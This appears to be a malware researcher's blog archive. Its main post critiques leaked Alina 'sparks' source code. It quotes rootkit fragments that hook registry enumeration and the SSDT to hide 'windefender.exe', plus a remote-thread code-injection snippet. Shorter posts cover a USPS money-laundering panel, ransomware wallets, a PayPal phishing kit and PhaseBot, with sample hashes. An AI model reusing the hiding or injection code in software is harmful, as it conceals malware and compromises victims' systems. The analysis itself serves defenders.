Thursday, 15 January 2015

Alina 'sparks' source code review

I recently got my hands on the source code of Alina "sparks". The main 'improvement' everyone is talking about, and what makes the price of this malware rise, is the rootkit feature.
Josh Grunzweig already did an interesting write-up on a sample, but what is this new version worth?

InjectedDLL.c from the source is a Chinese copy-paste of http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html, commented out and replaced with two kernel32 hooks instead, as if the author cannot into hooks :D
A comment is still in Chinese, as you can see on the screenshot.

Plus this:
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
{
  LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
  if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)
  {
    Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
  }
  return Result;
}

...

// Registry Value Hiding
Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext);
Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);
So many stupid mistakes in the code: no sanity checks in the hooks, nothing stable.
I haven't looked at a sample in the wild, but I doubt it works anyway.
The actual rootkit source (body stored as a hex array in RootkitDriver.inc, PDB path c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap.

This x86-32 driver is responsible for SSDT hooking of NtQuerySystemInformation, NtEnumerateValueKey and NtQueryDirectoryFile.
The driver is ridiculously simple:
NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc;
  BuildMdlForSSDT();
  InitStrings();
  SetHooks();
  return STATUS_SUCCESS;
}

BOOL SetHooks()
{
  if ( !NtQuerySystemInformationOrig )
    NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);
  if ( !NtEnumerateValueKeyOrig )
    NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);
  if ( !NtQueryDirectoryFileOrig )
    NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);
  return TRUE;
}

All of them hide the 'windefender' target process, file and registry key.
void InitStrings()
{
  RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderRegistryString, L"windefender");
}
That's the malware's name; Josh also pointed in this direction in his analysis.
First submitted to VT on 2013-10-17 17:27:10 UTC (1 year, 2 months ago):
https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/

Overall that DLL seems unused; the Alina project uses the driver I mentioned.
As for the project itself, it's still an awful piece of student lab work. Here is some of the log just from attempting to compile it:
source\grab\base.cpp(78)
If SHGetSpecialFolderPath returns FALSE, the strcat to SourceFilePath is performed anyway.

Two copy-pasted methods with the same mistake:
source\grab\base.cpp(298)
source\grab\base.cpp(433)
Leaking the process information handle pi.hProcess.

Using hKey from a failed function call:
source\grab\base.cpp(316):
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L,  KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {
      RegCloseKey(hKey);

pThread could be NULL; this is checked only before WriteProcessMemory but not before CreateRemoteThread:
source\grab\monitoringthread.cpp(110):
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten);
HANDLE ThreadHandle =  CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);

Where hwid is declared as char hwid[8], reading invalid data from hdr->hwid: the readable size is 8 bytes, but 18 bytes may be read:
source\grab\panelrequest.cpp(73):
memcpy(outkey, hdr->hwid, 18);

realloc might return a null pointer; assigning that null pointer to buf, which is the argument passed to realloc, leaks the original memory block:
source\grab\panelrequest.cpp(173)

The prior call to strncpy might not zero-terminate the string Result:
source\grab\scanner.cpp(159)

Return value of ReadFile ignored. If it fails anywhere, the code that follows is corrupted, since the cmd variable is not initialized:
source\grab\watcher.cpp(61)
source\grab\watcher.cpp(64)
source\grab\watcher.cpp(71)

Signed/unsigned mismatch:
source\grab\rootkitinstaller.cpp(47)

Unreferenced local variable hResult:
source\grab\base.cpp(158)

Using TerminateThread does not allow proper thread clean-up:
source\grab\watcher.cpp(125)
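Three of the defects in that compile log are plain C mistakes that show up in any code base, not just in malware: the realloc-leak pattern at panelrequest.cpp(173), the non-terminated strncpy at scanner.cpp(159), and the 18-byte memcpy out of an 8-byte hwid at panelrequest.cpp(73). As an added example (not code from the Alina source; the struct layout, names and sizes are constructed for illustration), here is each pattern written the way it should have been, so the failure path is handled instead of corrupting memory:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for a panel packet header whose hwid field is char hwid[8];
 * the trailing bytes model whatever happens to sit after the field in memory. */
#define HWID_LEN 8
struct panel_hdr {
    char hwid[HWID_LEN];
    char rest[16];
};

/* Defect 1: "buf = realloc(buf, n)" overwrites the only pointer to the old block
 * when realloc returns NULL, so the old block can never be freed. grow_buffer
 * assigns to a temporary first, keeps the old pointer alive and reports failure. */
int grow_buffer(char **buf, size_t *cap, size_t want)
{
    if (want <= *cap)
        return 0;
    char *tmp = realloc(*buf, want);
    if (tmp == NULL)
        return -1;        /* *buf is untouched; the caller can still free it */
    *buf = tmp;
    *cap = want;
    return 0;
}

/* Defect 2: strncpy pads with zeros but writes no terminator when the source is
 * at least dst_len bytes long. copy_name always terminates the last byte and
 * truncates instead of leaving an unterminated string behind. */
size_t copy_name(char *dst, size_t dst_len, const char *src)
{
    if (dst_len == 0)
        return 0;
    strncpy(dst, src, dst_len - 1);
    dst[dst_len - 1] = '\0';
    return strlen(dst);
}

/* Defect 3: memcpy(outkey, hdr->hwid, 18) reads 10 bytes past the 8-byte field.
 * copy_hwid copies exactly the field size and zero-fills the rest of outkey, so
 * the key never depends on adjacent memory. */
void copy_hwid(char *outkey, size_t outkey_len, const struct panel_hdr *hdr)
{
    size_t n = HWID_LEN < outkey_len ? HWID_LEN : outkey_len;
    memcpy(outkey, hdr->hwid, n);
    if (n < outkey_len)
        memset(outkey + n, 0, outkey_len - n);
}

/* Small driver so the block runs stand-alone. */
int main(void)
{
    size_t cap = 4;
    char *buf = malloc(cap);
    strcpy(buf, "abc");
    /* An impossible request makes realloc fail; the old block must survive. */
    if (grow_buffer(&buf, &cap, (size_t)-1) != 0)
        printf("realloc failed, old buffer still valid: %s\n", buf);
    free(buf);

    char name[4];
    size_t len = copy_name(name, sizeof name, "scanner.cpp");
    printf("truncated to \"%s\" (%zu chars)\n", name, len);

    struct panel_hdr hdr;
    memcpy(hdr.hwid, "ABCDEFGH", HWID_LEN);      /* constructed 8-byte id, no NUL */
    memset(hdr.rest, 'X', sizeof hdr.rest);     /* bytes that must never leak into the key */
    char outkey[18];
    copy_hwid(outkey, sizeof outkey, &hdr);
    printf("hwid copied: %.8s, padding byte 8 = %d\n", outkey, outkey[8]);
    return 0;
}
```

The point of each helper is the same: the failure path (allocation failure, over-long input, short source field) is decided by the function, not left to whatever bytes happen to follow in memory.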

Now, regarding the 'editions': sparks has some, for example the pipes, mutexes, user-agents and process blacklist, but most of these edits are minor things that anybody can do to 'customise' their own bot.
In any case, that can count as a code addition or something 'new'.
For the panel... well, it's like the bot: nothing changed at all.
It's still the same ugly design, still the same files with the same modification timestamps, no code addition, still the same cookie auth crap, as if the coder can't use sessions in PHP, and so on...

To conclude, the main improvement is a copy/pasted rootkit that doesn't work. I don't know how many bad guys bought this source for 1k or more, but it's definitely not worth it.
Overall it's a good example of how people can take some code, announce a rootkit to impress, and bet everything on malware notoriety.
This reminds me of the guys who announced IceIX on malware forums, when in the end the samples were just a basic ZeuS with broken improvements.

Hi Benson.

Wednesday, 14 January 2015

Tiberium/Consuella USPS money laundering service


Consuella was a 'USPS drop service' run by one of the Lampeduza administrators.
This type of service helps credit card thieves "cash out" by sending packages with carded labels overseas (or not) via USPS.
They were also constantly recruiting mules in the United States to keep addresses in rotation.


Here is what the service looks like from an admin point of view:


Add a payment:

Users:
Supports:

News:

Settings:

Consuella was incredibly simple compared to other drop-shipping services such as addtrack.biz and pac-man.co, which had fake websites for mules on the panel.

Tuesday, 13 January 2015

Cryptorbit locker

When the Cryptorbit ransomware was targeting people, I visited them.

SQL database:

Bad guy wallets:
1H6jc6Mz535zTts6DWdeJf3HdH4owGjsXo
15JTKDkU4U6Tn5MBc9Pt52mMzXDmvmaanR
18yP3oKzeqChWCYG2ZGPcBhMQBiXFeR2GF
17FSkXDULjtK6R9G3cpwmLMYbWRZJ9c8vZ
1KZvxpPzvkSCqm3VTffWBWcLumWK1KJfkK

Pseudo decryptor ~ 4a8e11468649e045976574691cf53732

Captain Barbarossa

Captain Barbarossa is used for PayPal phishing and sold as a phishing kit; the kit includes an admin panel.
The user is tricked with a fake PayPal login asking for details, here in German:



Once the info is submitted, the data is sent to the panel.
Login:

Main:

Log manager:

Monday, 12 January 2015

Phase (Win32/PhaseBot-A)

Small write-up about 'Phase', a malware that appeared and vanished very rapidly.
I had a look at it with MalwareTech, who wrote several stories about it. It was shown that Phase is in reality a 'new' version of Solar bot, or at least not so new: the code is so copy/pasted that even antivirus such as Avast produces false positives and now detects Napolar (Solar) as PhaseBot.

Advert:

Phase support website:

The coder is using a public snippet for chatting with customers:
So weak that it is even vulnerable to XSS.

Master balance? Less than 1k.
Phase doesn't seem so popular, and also got rapidly lynched by other actors on forums.

Anyway, let's have a look at the web panel.
Login:

Dashboard:

Commands:

Botlist:

Credentials:

Socks5:

Browsers:

Modules:

Analyzer detector:

RDP:

Settings:

FAQ:

Structure:

In-the-wild panel, with the RAM scraper plugin + VNC:

RAM scraper plugin:

Point-of-sale remote controlled:

Another botnet with hacked point of sale remote controlled:

Wallet stealer:

Phase samples:
ae7a56b3adf6f7684ba14a77c017904d
12dccdec47928e5298055996415a94f2
d1446326bf1c69ea9df6e65bd472f358
1f3e808a3ccd981f3e61de227dae93b8
6ce0bb4cd86295f915160d7207a07a47
5767b9bf9cb6f2b5259f29dd8b873e36
a10f84153dba7b73980f0ff50d8cc8e6
f8ffcab3324561598ce5c375c07066be
e4574fbc1014d27e1b6906bfc5351e0e
d2ed20b1996e7e5bad2b91fd255732ef
f89b4e626c7a81544ca7395be3262cf6
ef69575e14fa965380242db26675d2df
fc586c3ec37e51668e905d0acfc913f6
eb9b56d829c3951b6e9cb5e4a651f7c8
6f53d3cd1acb7541bcc7399c4af001b1
19fa3927577571c51428f6eee2b5f52f
4ec84f1aa91e4cdc12118002244ca582
20e3a9ec396ad8b57a36ea3c6b9f151a
fe5dfa53204a65eca741ceab352c3b00
ace0a059dc2264c847d4e6c91f829dfd
f01c1ea73e968c2309391dcf3f0a2848

Unencrypted RAM scraper plugin: 1e18ee52d6f0322d065b07ec7bfcbbe8
Unencrypted VNC plugin: 94eefdce643a084f95dd4c91289c3cf0
Panel: c43933e7c8b9d4c95703f798b515b384 (with a small Trend Micro signature fail, "PHP_SORAYA.A"; no, this is not the Soraya panel).
Needless to say the panel was also vulnerable.